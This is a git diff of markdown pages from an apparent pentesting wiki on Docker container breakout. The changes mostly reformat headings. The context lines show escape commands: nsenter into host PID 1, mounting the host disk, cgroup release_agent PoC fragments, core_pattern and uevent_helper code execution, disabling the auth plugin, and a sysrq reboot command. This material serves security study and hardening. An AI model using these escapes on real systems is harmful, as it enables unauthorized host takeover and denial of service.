It's possible that when the sysadmin configured the docker firewall he **forgot about some important attribute of a parameter** of the [**API**](https://docs.docker.com/engine/api/v1.40/#operation/ContainerList) like "**Capabilities**" inside "**HostConfig**". In the following example it's possible to abuse this misconfiguration to create and run a container with the **SYS\_MODULE** capability:
@@ -191,7 +189,7 @@ capsh --print
The **`HostConfig`** is the key that usually contains the **interesting** **privileges** to escape from the container. However, as we have discussed previously, note how using Binds outside of it also works and may allow you to bypass restrictions.
{% endhint %}
-### Disabling Plugin
+## Disabling Plugin
If the **sysadmin** **forgotten** to **forbid** the ability to **disable** the **plugin**, you can take advantage of this to completely disable it!
@@ -209,11 +207,11 @@ docker plugin enable authobot
Remember to **re-enable the plugin after escalating**, or a **restart of docker service won’t work**!
-### Auth Plugin Bypass writeups
+## Auth Plugin Bypass writeups
* [https://staaldraad.github.io/post/2019-07-11-bypass-docker-plugin-with-containerd/](https://staaldraad.github.io/post/2019-07-11-bypass-docker-plugin-with-containerd/)
-## References
+# References
* [https://docs.docker.com/engine/extend/plugins\_authorization/](https://docs.docker.com/engine/extend/plugins\_authorization/)
diff --git a/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation.md b/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation.md
index d5c8ed70..a904299b 100644
--- a/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation.md
+++ b/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Docker Breakout / Privilege Escalation
-
-## Automatic Enumeration & Escape
+# Automatic Enumeration & Escape
* [**linpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS): It can also **enumerate containers**
* [**CDK**](https://github.com/cdk-team/CDK#installationdelivery): This tool is pretty **useful to enumerate the container you are into even try to escape automatically**
@@ -27,7 +25,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* [**deepce**](https://github.com/stealthcopter/deepce): Tool to enumerate and escape from containers
* [**grype**](https://github.com/anchore/grype): Get the CVEs contained in the software installed in the image
-## Mounted Docker Socket Escape
+# Mounted Docker Socket Escape
If somehow you find that the **docker socket is mounted** inside the docker container, you will be able to escape from it.\
This usually happen in docker containers that for some reason need to connect to docker daemon to perform actions.
@@ -64,7 +62,7 @@ Additionally, pay attention to the runtime sockets of other high-level runtimes:
* ...
{% endhint %}
-## Capabilities Abuse Escape
+# Capabilities Abuse Escape
You should check the capabilities of the container, if it has any of the following ones, you might be able to scape from it: **`CAP_SYS_ADMIN`**_,_ **`CAP_SYS_PTRACE`**, **`CAP_SYS_MODULE`**, **`DAC_READ_SEARCH`**, **`DAC_OVERRIDE, CAP_SYS_RAWIO`, `CAP_SYSLOG`, `CAP_NET_RAW`, `CAP_NET_ADMIN`**
@@ -80,7 +78,7 @@ In the following page you can **learn more about linux capabilities** and how to
[linux-capabilities.md](../linux-capabilities.md)
{% endcontent-ref %}
-## Escape from Privileged Containers
+# Escape from Privileged Containers
A privileged container can be created with the flag `--privileged` or disabling specific defenses:
@@ -99,7 +97,7 @@ The `--privileged` flag introduces significant security concerns, and the exploi
[docker-privileged.md](docker-privileged.md)
{% endcontent-ref %}
-### Privileged + hostPID
+## Privileged + hostPID
With these permissions you can just **move to the namespace of a process running in the host as root** like init (pid:1) just running: `nsenter --target 1 --mount --uts --ipc --net --pid -- bash`
@@ -109,7 +107,7 @@ Test it in a container executing:
docker run --rm -it --pid=host --privileged ubuntu bash
```
-### Privileged
+## Privileged
Just with the privileged flag you can try to **access the host's disk** or try to **escape abusing release\_agent or other escapes**.
@@ -119,7 +117,7 @@ Test the following bypasses in a container executing:
docker run --rm -it --privileged ubuntu bash
```
-#### Mounting Disk - Poc1
+### Mounting Disk - Poc1
Well configured docker containers won't allow command like **fdisk -l**. However on miss-configured docker command where the flag `--privileged` or `--device=/dev/sda1` with caps is specified, it is possible to get the privileges to see the host drive.
@@ -134,15 +132,15 @@ mount /dev/sda1 /mnt/hola
And voilà ! You can now access the filesystem of the host because it is mounted in the `/mnt/hola` folder.
-#### Mounting Disk - Poc2
+### Mounting Disk - Poc2
Within the container, an attacker may attempt to gain further access to the underlying host OS via a writable hostPath volume created by the cluster. Below is some common things you can check within the container to see if you leverage this attacker vector:
```bash
-#### Check if You Can Write to a File-system
+### Check if You Can Write to a File-system
echo 1 > /proc/sysrq-trigger
-#### Check root UUID
+### Check root UUID
cat /proc/cmdline
BOOT_IMAGE=/boot/vmlinuz-4.4.0-197-generic root=UUID=b2e62f4f-d338-470e-9ae7-4fc0e014858c ro console=tty1 console=ttyS0 earlyprintk=ttyS0 rootdelay=300
@@ -155,11 +153,11 @@ mkdir /mnt-test
mount /dev/sda1 /mnt-test
mount: /mnt: permission denied. ---> Failed! but if not, you may have access to the underlying host OS file-system now.
-#### debugfs (Interactive File System Debugger)
+### debugfs (Interactive File System Debugger)
debugfs /dev/sda1
```
-#### Privileged Escape Abusing release\_agent - PoC1
+### Privileged Escape Abusing release\_agent - PoC1
{% code title="Initial PoC" %}
```bash
@@ -167,7 +165,7 @@ debugfs /dev/sda1
# docker run --rm -it --privileged ubuntu bash
# Finds + enables a cgroup release_agent
-## Looks for something like: /sys/fs/cgroup/*/release_agent
+# Looks for something like: /sys/fs/cgroup/*/release_agent
d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
# If "d" is empty, this won't work, you need to use the next PoC
@@ -197,7 +195,7 @@ cat /o
```
{% endcode %}
-#### Privileged Escape Abusing release\_agent - PoC2
+### Privileged Escape Abusing release\_agent - PoC2
{% code title="Second PoC" %}
```bash
@@ -249,7 +247,7 @@ Find an **explanation of the technique** in:
[docker-release\_agent-cgroups-escape.md](docker-breakout-privilege-escalation/docker-release\_agent-cgroups-escape.md)
{% endcontent-ref %}
-#### Privileged Escape Abusing release\_agent without known the relative path - PoC3
+### Privileged Escape Abusing release\_agent without known the relative path - PoC3
In the previous exploits the **absolute path of the continer inside the hosts filesystem is disclosed**. However, this isn’t always the case. In cases where you **don’t know the absolute path of the continer inside the host** you can use this technique:
@@ -347,7 +345,7 @@ root 10 2 0 11:25 ? 00:00:00 [ksoftirqd/0]
...
```
-#### Privileged Escape Abusing Sensitive Mounts
+### Privileged Escape Abusing Sensitive Mounts
There are several files that might mounted that give **information about the underlaying host**. Some of them may even indicate **something to be executed by the host when something happens** (which will allow a attacker to escape from the container).\
The abuse of these files may allow that:
@@ -364,7 +362,7 @@ However, you can find **other sensitive files** to check for in this page:
[sensitive-mounts.md](docker-breakout-privilege-escalation/sensitive-mounts.md)
{% endcontent-ref %}
-### Arbitrary Mounts
+## Arbitrary Mounts
In several occasions you will find that the **container has some volume mounted from the host**. If this volume wasn’t correctly configured you might be able to **access/modify sensitive data**: Read secrets, change ssh authorized\_keys…
@@ -372,7 +370,7 @@ In several occasions you will find that the **container has some volume mounted
docker run --rm -it -v /:/host ubuntu bash
```
-### hostPID
+## hostPID
If you can access the processes of the host you are going to be able to access a lot of sensitive information stored in those processes. Run test lab:
@@ -411,7 +409,7 @@ You can also **kill processes and cause a DoS**.
If you somehow has privileged **access over a process outside of the container**, you could run something like `nsenter --target --all` or `nsenter --target --mount --net --pid --cgroup` to **run a shell with the same ns restrictions** (hopefully none) **as that process.**
{% endhint %}
-### hostNetwork
+## hostNetwork
```
docker run --rm -it --network=host ubuntu bash
@@ -432,7 +430,7 @@ You will be able also to access **network services binded to localhost** inside
[kubernetes-access-to-other-clouds.md](../../../cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md)
{% endcontent-ref %}
-### hostIPC
+## hostIPC
```
docker run --rm -it --ipc=host ubuntu bash
@@ -443,9 +441,9 @@ If you only have `hostIPC=true`, you most likely can't do much. If any process o
* **Inspect /dev/shm** - Look for any files in this shared memory location: `ls -la /dev/shm`
* **Inspect existing IPC facilities** – You can check to see if any IPC facilities are being used with `/usr/bin/ipcs`. Check it with: `ipcs -a`
-## CVEs
+# CVEs
-### Runc exploit (CVE-2019-5736)
+## Runc exploit (CVE-2019-5736)
In case you can execute `docker exec` as root (probably with sudo), you try to escalate privileges escaping from a container abusing CVE-2019-5736 (exploit [here](https://github.com/Frichetten/CVE-2019-5736-PoC/blob/master/main.go)). This technique will basically **overwrite** the _**/bin/sh**_ binary of the **host** **from a container**, so anyone executing docker exec may trigger the payload.
@@ -462,9 +460,9 @@ For more information: [https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape
There are other CVEs the container can be vulnerable too, you can find a list in [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/cve-list](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/cve-list)
{% endhint %}
-## Breakout Templates
+# Breakout Templates
-### Container Breakout through Usermode helper Template
+## Container Breakout through Usermode helper Template
If you are in **userspace** (**no kernel exploit** involved) the way to find new escapes mainly involve the following actions (these templates usually require a container in privileged mode):
@@ -476,7 +474,7 @@ If you are in **userspace** (**no kernel exploit** involved) the way to find new
* Have **enough capabilities and disabled protections** to be able to abuse that functionality
* You might need to **mount things** o perform **special privileged actions** you cannot do in a default docker container
-## References
+# References
* [https://twitter.com/\_fel1x/status/1151487053370187776?lang=en-GB](https://twitter.com/\_fel1x/status/1151487053370187776?lang=en-GB)
* [https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/)
diff --git a/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md b/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md
index 688f3d54..18b749b1 100644
--- a/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md
+++ b/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Docker release\_agent cgroups escape
-
-### Breaking down the proof of concept
+## Breaking down the proof of concept
To trigger this exploit we need a cgroup where we can create a `release_agent` file and trigger `release_agent` invocation by killing all processes in the cgroup. The easiest way to accomplish that is to mount a cgroup controller and create a child cgroup.
@@ -86,7 +84,7 @@ root 10 0.0 0.0 0 0 ? I 13:57 0:00 [rcu_sched]
root 11 0.0 0.0 0 0 ? S 13:57 0:00 [migration/0]
```
-### References
+## References
* [https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/)
diff --git a/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md b/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md
index 4b83adb3..f42ecb65 100644
--- a/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md
+++ b/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md
@@ -17,17 +17,15 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# release\_agent exploit - Relative Paths to PIDs
-
-## Introduction
+# Introduction
The previous PoCs work fine when the container is configured with a storage-driver which exposes the **full host path of the mount point**, for example `overlayfs`, however there are configurations which did **not obviously disclose the host file system mount point**.
In this PoC instead of using the path where the container is located inside the hosts filesystem, we are going to discover a container PID inside the host a
-### Examples of container not exposing the path location inside the host
+## Examples of container not exposing the path location inside the host
-#### Kata Containers
+### Kata Containers
```
root@container:~$ head -1 /etc/mtab
@@ -36,7 +34,7 @@ kataShared on / type 9p (rw,dirsync,nodev,relatime,mmap,access=client,trans=virt
[Kata Containers](https://katacontainers.io) by default mounts the root fs of a container over `9pfs`. This discloses no information about the location of the container file system in the Kata Containers Virtual Machine.
-#### Device Mapper
+### Device Mapper
```
root@container:~$ head -1 /etc/mtab
@@ -45,11 +43,11 @@ root@container:~$ head -1 /etc/mtab
I saw a container with this root mount in a live environment, I believe the container was running with a specific `devicemapper` storage-driver configuration, but at this point I have been unable to replicate this behaviour in a test environment.
-## PoC
+# PoC
The one key piece of information required is the **full path, relative to the container host, of a file to execute within the container**. Without being able to discern this from mount points within the container we have to look elsewhere.
-### /proc/\/root
+## /proc/\/root
The Linux `/proc` pseudo-filesystem exposes kernel process data structures for all processes running on a system, including those running in different namespaces, for example within a container. This can be shown by running a command in a container and accessing the `/proc` directory of the process on the host:Container
@@ -101,7 +99,7 @@ findme
**This changes the requirement for the attack from knowing the full path, relative to the container host, of a file within the container, to knowing the pid of **_**any**_** process running in the container.**
{% endhint %}
-### Pid Bashing
+## Pid Bashing
This is actually the easy part, process ids in Linux are numerical and assigned sequentially. The `init` process is assigned process id `1` and all subsequent processes are assigned incremental ids. To identify the **host process id of a process within a container, a brute force incremental search can be used**:
@@ -121,7 +119,7 @@ root@host:~$ cat /proc/${COUNTER}/root/findme
findme
```
-### Putting it All Together
+## Putting it All Together
To complete this attack the brute force technique can be used to **guess the PID for the path `/proc//root/payload.sh`**, with **each iteration** writing the guessed pid **path to the cgroups `release_agent` file, triggering the `release_agent`**, and seeing if an output file is created.
@@ -219,7 +217,7 @@ root 10 2 0 11:25 ? 00:00:00 [ksoftirqd/0]
...
```
-## References
+# References
* [https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html](https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html)
diff --git a/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/sensitive-mounts.md b/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/sensitive-mounts.md
index 0f381a52..9cd72370 100644
--- a/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/sensitive-mounts.md
+++ b/linux-unix/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/sensitive-mounts.md
@@ -17,21 +17,19 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Sensitive Mounts
-
(_**This info was taken from**_ [_**https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts**_](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts))
Due to the lack of namespace support, the exposure of `/proc` and `/sys` offers a source of significant attack surface and information disclosure. Numerous files within the `procfs` and `sysfs` offer a risk for container escape, host modification or basic information disclosure which could facilitate other attacks.
In order to abuse these techniques might be enough just to **miss-configure something like `-v /proc:/host/proc`** as AppArmor does not protect `/host/proc` because **AppArmor is path based**
-## procfs
+# procfs
-### /proc/sys
+## /proc/sys
`/proc/sys` typically allows access to modify kernel variables, often controlled through `sysctl(2)`.
-#### /proc/sys/kernel/core\_pattern
+### /proc/sys/kernel/core\_pattern
[/proc/sys/kernel/core\_pattern](https://man7.org/linux/man-pages/man5/core.5.html) defines a program which is executed on core-file generation (typically a program crash) and is passed the core file as standard input if the first character of this file is a pipe symbol `|`. This program is run by the root user and will allow up to 128 bytes of command line arguments. This would allow trivial code execution within the container host given any crash and core file generation (which can be simply discarded during a myriad of malicious actions).
@@ -42,7 +40,7 @@ echo "|$overlay/shell.sh" > core_pattern
sleep 5 && ./crash &
```
-#### /proc/sys/kernel/modprobe
+### /proc/sys/kernel/modprobe
[/proc/sys/kernel/modprobe](https://man7.org/linux/man-pages/man5/proc.5.html) contains the path to the kernel module loader, which is called when loading a kernel module such as via the [modprobe](https://man7.org/linux/man-pages/man8/modprobe.8.html) command. Code execution can be gained by performing any action which will trigger the kernel to attempt to load a kernel module (such as using the crypto-API to load a currently unloaded crypto-module, or using ifconfig to load a networking module for a device not currently used).
@@ -51,26 +49,26 @@ sleep 5 && ./crash &
ls -l `cat /proc/sys/kernel/modprobe`
```
-#### /proc/sys/vm/panic\_on\_oom
+### /proc/sys/vm/panic\_on\_oom
[/proc/sys/vm/panic\_on\_oom](https://man7.org/linux/man-pages/man5/proc.5.html) is a global flag that determines whether the kernel will panic when an Out of Memory (OOM) condition is hit (rather than invoking the OOM killer). This is more of a Denial of Service (DoS) attack than container escape, but it no less exposes an ability which should only be available to the host
-#### /proc/sys/fs
+### /proc/sys/fs
[/proc/sys/fs](https://man7.org/linux/man-pages/man5/proc.5.html) directory contains an array of options and information concerning various aspects of the file system, including quota, file handle, inode, and dentry information. Write access to this directory would allow various denial-of-service attacks against the host.
-#### /proc/sys/fs/binfmt\_misc
+### /proc/sys/fs/binfmt\_misc
[/proc/sys/fs/binfmt\_misc](https://man7.org/linux/man-pages/man5/proc.5.html) allows executing miscellaneous binary formats, which typically means various **interpreters can be registered for non-native binary** formats (such as Java) based on their magic number. You can make the kernel execute a binary registering it as handlers.\
You can find an exploit in [https://github.com/toffan/binfmt\_misc](https://github.com/toffan/binfmt\_misc): _Poor man's rootkit, leverage_ [_binfmt\_misc_](https://github.com/torvalds/linux/raw/master/Documentation/admin-guide/binfmt-misc.rst)_'s_ [_credentials_](https://github.com/torvalds/linux/blame/3bdb5971ffc6e87362787c770353eb3e54b7af30/Documentation/binfmt\_misc.txt#L62) _option to escalate privilege through any suid binary (and to get a root shell) if `/proc/sys/fs/binfmt_misc/register` is writeable._
For a more in depth explanation of this technique check [https://www.youtube.com/watch?v=WBC7hhgMvQQ](https://www.youtube.com/watch?v=WBC7hhgMvQQ)
-### /proc/config.gz
+## /proc/config.gz
[/proc/config.gz](https://man7.org/linux/man-pages/man5/proc.5.html) depending on `CONFIG_IKCONFIG_PROC` settings, this exposes a compressed version of the kernel configuration options for the running kernel. This may allow a compromised or malicious container to easily discover and target vulnerable areas enabled in the kernel.
-### /proc/sysrq-trigger
+## /proc/sysrq-trigger
`Sysrq` is an old mechanism which can be invoked via a special `SysRq` keyboard combination. This can allow an immediate reboot of the system, issue of `sync(2)`, remounting all filesystems as read-only, invoking kernel debuggers, and other operations.
@@ -81,21 +79,21 @@ If the guest is not properly isolated, it can trigger the [sysrq](https://www.ke
echo b > /proc/sysrq-trigger
```
-### /proc/kmsg
+## /proc/kmsg
[/proc/kmsg](https://man7.org/linux/man-pages/man5/proc.5.html) can expose kernel ring buffer messages typically accessed via `dmesg`. Exposure of this information can aid in kernel exploits, trigger kernel address leaks (which could be used to help defeat the kernel Address Space Layout Randomization (KASLR)), and be a source of general information disclosure about the kernel, hardware, blocked packets and other system details.
-### /proc/kallsyms
+## /proc/kallsyms
[/proc/kallsyms](https://man7.org/linux/man-pages/man5/proc.5.html) contains a list of kernel exported symbols and their address locations for dynamic and loadable modules. This also includes the location of the kernel's image in physical memory, which is helpful for kernel exploit development. From these locations, the base address or offset of the kernel can be located, which can be used to overcome kernel Address Space Layout Randomization (KASLR).
For systems with `kptr_restrict` set to `1` or `2`, this file will exist but not provide any address information (although the order in which the symbols are listed is identical to the order in memory).
-### /proc/\[pid]/mem
+## /proc/\[pid]/mem
[/proc/\[pid\]/mem](https://man7.org/linux/man-pages/man5/proc.5.html) exposes interfaces to the kernel memory device `/dev/mem`. While the PID Namespace may protect from some attacks via this `procfs` vector, this area of has been historically vulnerable, then thought safe and again found to be [vulnerable](https://git.zx2c4.com/CVE-2012-0056/about/) for privilege escalation.
-### /proc/kcore
+## /proc/kcore
[/proc/kcore](https://man7.org/linux/man-pages/man5/proc.5.html) represents the physical memory of the system and is in an ELF core format (typically found in core dump files). It does not allow writing to said memory. The ability to read this file (restricted to privileged users) can leak memory contents from the host system and other containers.
@@ -103,25 +101,25 @@ The large reported file size represents the maximum amount of physically address
[Dumping /proc/kcore in 2019](https://schlafwandler.github.io/posts/dumping-/proc/kcore/)
-### /proc/kmem
+## /proc/kmem
`/proc/kmem` is an alternate interface for [/dev/kmem](https://man7.org/linux/man-pages/man4/kmem.4.html) (direct access to which is blocked by the cgroup device whitelist), which is a character device file representing kernel virtual memory. It allows both reading and writing, allowing direct modification of kernel memory.
-### /proc/mem
+## /proc/mem
`/proc/mem` is an alternate interface for [/dev/mem](https://man7.org/linux/man-pages/man4/kmem.4.html) (direct access to which is blocked by the cgroup device whitelist), which is a character device file representing physical memory of the system. It allows both reading and writing, allowing modification of all memory. (It requires slightly more finesse than `kmem`, as virtual addresses need to be resolved to physical addresses first).
-### /proc/sched\_debug
+## /proc/sched\_debug
`/proc/sched_debug` is a special file returns process scheduling information for the entire system. This information includes process names and process IDs from all namespaces in addition to process cgroup identifiers. This effectively bypasses the PID namespace protections and is other/world readable, so it can be exploited in unprivileged containers as well.
-### /proc/\[pid]/mountinfo
+## /proc/\[pid]/mountinfo
[/proc/\[pid\]/mountinfo](https://man7.org/linux/man-pages/man5/proc.5.html) contains information about mount points in the process's mount namespace. It exposes the location of the container `rootfs` or image.
-## sysfs
+# sysfs
-### /sys/kernel/uevent\_helper
+## /sys/kernel/uevent\_helper
`uevents` are events triggered by the kernel when a device is added or removed. Notably, the path for the `uevent_helper` can be modified by writing to `/sys/kernel/uevent_helper`. Then, when a `uevent` is triggered (which can also be done from userland by writing to files such as `/sys/class/mem/null/uevent`), the malicious `uevent_helper` gets executed.
@@ -144,31 +142,31 @@ echo change > /sys/class/mem/null/uevent
cat /output
```
-### /sys/class/thermal
+## /sys/class/thermal
Access to ACPI and various hardware settings for temperature control, typically found in laptops or gaming motherboards. This may allow for DoS attacks against the container host, which may even lead to physical damage.
-### /sys/kernel/vmcoreinfo
+## /sys/kernel/vmcoreinfo
This file can leak kernel addresses which could be used to defeat KASLR.
-### /sys/kernel/security
+## /sys/kernel/security
In `/sys/kernel/security` mounted the `securityfs` interface, which allows configuration of Linux Security Modules. This allows configuration of [AppArmor policies](https://gitlab.com/apparmor/apparmor/-/wikis/Kernel\_interfaces#securityfs-syskernelsecurityapparmor), and so access to this may allow a container to disable its MAC system.
-### /sys/firmware/efi/vars
+## /sys/firmware/efi/vars
`/sys/firmware/efi/vars` exposes interfaces for interacting with EFI variables in NVRAM. While this is not typically relevant for most servers, EFI is becoming more and more popular. Permission weaknesses have even lead to some bricked laptops.
-### /sys/firmware/efi/efivars
+## /sys/firmware/efi/efivars
`/sys/firmware/efi/efivars` provides an interface to write to the NVRAM used for UEFI boot arguments. Modifying them can render the host machine unbootable.
-### /sys/kernel/debug
+## /sys/kernel/debug
`debugfs` provides a "no rules" interface by which the kernel (or kernel modules) can create debugging interfaces accessible to userland. It has had a number of security issues in the past, and the "no rules" guidelines behind the filesystem have often clashed with security constraints.
-## References
+# References
* [Understanding and Hardening Linux Containers](https://research.nccgroup.com/wp-content/uploads/2020/07/ncc\_group\_understanding\_hardening\_linux\_containers-1-1.pdf)
* [Abusing Privileged and Unprivileged Linux Containers](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2016/june/container\_whitepaper.pdf)
diff --git a/linux-unix/privilege-escalation/docker-breakout/docker-privileged.md b/linux-unix/privilege-escalation/docker-breakout/docker-privileged.md
index 4af07b97..210cfb58 100644
--- a/linux-unix/privilege-escalation/docker-breakout/docker-privileged.md
+++ b/linux-unix/privilege-escalation/docker-breakout/docker-privileged.md
@@ -17,13 +17,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Docker --privileged
-
-## What Affects
+# What Affects
When you run a container as privileged these are the protections you are disabling:
-### Mount /dev
+## Mount /dev
In a privileged container, all the **devices can be accessed in `/dev/`**. Therefore you can **escape** by **mounting** the disk of the host.
@@ -50,7 +48,7 @@ cpu nbd0 pts stdout tty27
{% endtab %}
{% endtabs %}
-### Read-only kernel file systems
+## Read-only kernel file systems
Kernel file systems provide a mechanism for a **process to alter the way the kernel runs.** By default, we **don't want container processes to modify the kernel**, so we mount kernel file systems as read-only within the container.
@@ -75,7 +73,7 @@ mount | grep '(ro'
{% endtab %}
{% endtabs %}
-### Masking over kernel file systems
+## Masking over kernel file systems
The **/proc** file system is namespace-aware, and certain writes can be allowed, so we don't mount it read-only. However, specific directories in the /proc file system need to be **protected from writing**, and in some instances, **from reading**. In these cases, the container engines mount **tmpfs** file systems over potentially dangerous directories, preventing processes inside of the container from using them.
@@ -102,7 +100,7 @@ mount | grep /proc.*tmpfs
{% endtab %}
{% endtabs %}
-### Linux capabilities
+## Linux capabilities
Container engines launch the containers with a **limited number of capabilities** to control what goes on inside of the container by default. **Privileged** ones have **all** the **capabilities** accesible. To learn about capabilities read:
@@ -136,7 +134,7 @@ Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fset
You can manipulate the capabilities available to a container without running in `--privileged` mode by using the `--cap-add` and `--cap-drop` flags.
-### Seccomp
+## Seccomp
**Seccomp** is useful to **limit** the **syscalls** a container can call. A default seccomp profile is enabled by default when running docker containers, but in privileged mode it is disabled. Learn more about Seccomp here:
@@ -171,7 +169,7 @@ Seccomp_filters: 0
Also, note that when Docker (or other CRIs) are used in a **Kubernetes** cluster, the **seccomp filter is disabled by default**
-### AppArmor
+## AppArmor
**AppArmor** is a kernel enhancement to confine **containers** to a **limited** set of **resources** with **per-program profiles**. When you run with the `--privileged` flag, this protection is disabled.
@@ -184,7 +182,7 @@ Also, note that when Docker (or other CRIs) are used in a **Kubernetes** cluster
--security-opt apparmor=unconfined
```
-### SELinux
+## SELinux
When you run with the `--privileged` flag, **SELinux labels are disabled**, and the container runs with the **label that the container engine was executed with**. This label is usually `unconfined` and has **full access to the labels that the container engine does**. In rootless mode, the container runs with `container_runtime_t`. In root mode, it runs with `spc_t`.
@@ -197,9 +195,9 @@ When you run with the `--privileged` flag, **SELinux labels are disabled**, and
--security-opt label:disable
```
-## What Doesn't Affect
+# What Doesn't Affect
-### Namespaces
+## Namespaces
Namespaces are **NOT affected** by the `--privileged` flag. Even though they don't have the security constraints enabled, they **do not see all of the processes on the system or the host network, for example**. Users can disable individual namespaces by using the **`--pid=host`, `--net=host`, `--ipc=host`, `--uts=host`** container engines flags.
@@ -227,11 +225,11 @@ PID USER TIME COMMAND
{% endtab %}
{% endtabs %}
-### User namespace
+## User namespace
Container engines do **NOT use user namespace by default**. However, rootless containers always use it to mount file systems and use more than a single UID. In the rootless case, user namespace can not be disabled; it is required to run rootless containers. User namespaces prevent certain privileges and add considerable security.
-## References
+# References
* [https://www.redhat.com/sysadmin/privileged-flag-container-engines](https://www.redhat.com/sysadmin/privileged-flag-container-engines)
diff --git a/linux-unix/privilege-escalation/docker-breakout/namespaces.md b/linux-unix/privilege-escalation/docker-breakout/namespaces.md
index 5f4d3698..3ed286be 100644
--- a/linux-unix/privilege-escalation/docker-breakout/namespaces.md
+++ b/linux-unix/privilege-escalation/docker-breakout/namespaces.md
@@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Namespaces
-
To get the namespace of a container you can do:
```bash
@@ -34,7 +32,7 @@ docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash
docker run -ti --name ubuntu2 -v /usr:/ubuntu2 ubuntu bash
```
-### **PID namespace**
+## **PID namespace**
Let’s look at processes running in Container ubuntu1:
@@ -64,7 +62,7 @@ root 5516 1697 0 05:54 pts/31 00:00:00 bash
bash process in Container1 and Container2 have the same PID 1 since they have their own process namespace. The same bash process shows up in host machine as a different pid.
-### **Mount namespace**
+## **Mount namespace**
Let’s look at the root directory content in Container ubuntu1:
@@ -84,7 +82,7 @@ boot etc lib media opt root sbin sys ubuntu2 var
As we can see above, each Container has its own filesystem and we can see “/usr” from host machine mounted as “/ubuntu1” in Container1 and as “/ubuntu2” in Container2.
-### **Network namespace**
+## **Network namespace**
Let’s look at ifconfig output in Container ubuntu1:
@@ -134,7 +132,7 @@ lo Link encap:Local Loopback
As we can see above, each Container has their own IP address.
-### **IPC Namespace**
+## **IPC Namespace**
Let’s create shared memory in Container ubuntu1:
@@ -162,7 +160,7 @@ key shmid owner perms bytes nattch status
As we can see above, each Container has its own IPC namespace and shared memory created in Container 1 is not visible in Container 2.
-### **UTS namespace**
+## **UTS namespace**
Let’s look at hostname of Container ubuntu1:
@@ -180,7 +178,7 @@ root@8beb85abe6a5:/# hostname
As we can see above, each Container has its own hostname and domainname.
-### User namespace
+## User namespace
User namespaces are available from Linux kernel versions > 3.8. With User namespace, **userid and groupid in a namespace is different from host machine’s userid and groupid** for the same user and group. When Docker Containers use User namespace, each **container gets their own userid and groupid**. For example, **root** user **inside** **Container** is **not** root **inside** **host** **machine**. This provides greater security. In case the Container gets compromised and the hacker gets root access inside Container, the hacker still cannot break inside the host machine since the root user inside the Container is not root inside the host machine. Docker introduced support for user namespace in version 1.10.\
To use user namespace, Docker daemon needs to be started with **`--userns-remap=default`**(In ubuntu 14.04, this can be done by modifying `/etc/default/docker` and then executing `sudo service docker restart`)\
@@ -214,11 +212,11 @@ smakam14@jungle1:/usr$ cat /proc/8955/uid_map
As we can see above, userid 0(root) in container 1 is mapped to userid 231072 in host machine.\
In the current Docker user namespace implementation, UID and GID mapping happens at Docker daemon level. There is work ongoing to allow the mappings to be done at Container level so that multi-tenant support is possible.
-### CGroup Namespace
+## CGroup Namespace
Each cgroup namespace has its **own set of cgroup root directories**. These root directories are the base points for the relative locations displayed in the corresponding records in the `/proc/[pid]/cgroup` file. When a process creates a new cgroup namespace using clone(2) or unshare(2) with the CLONE\_NEWCGROUP flag, its current cgroups directories become the cgroup root directories of the new namespace. (This applies both for the cgroups version 1 hierarchies and the cgroups version 2 unified hierarchy.)
-## References
+# References
* [https://sreeninet.wordpress.com/2016/03/06/docker-security-part-2docker-engine/](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-2docker-engine/)
* [https://man7.org/linux/man-pages/man7/cgroup\_namespaces.7.html](https://man7.org/linux/man-pages/man7/cgroup\_namespaces.7.html)
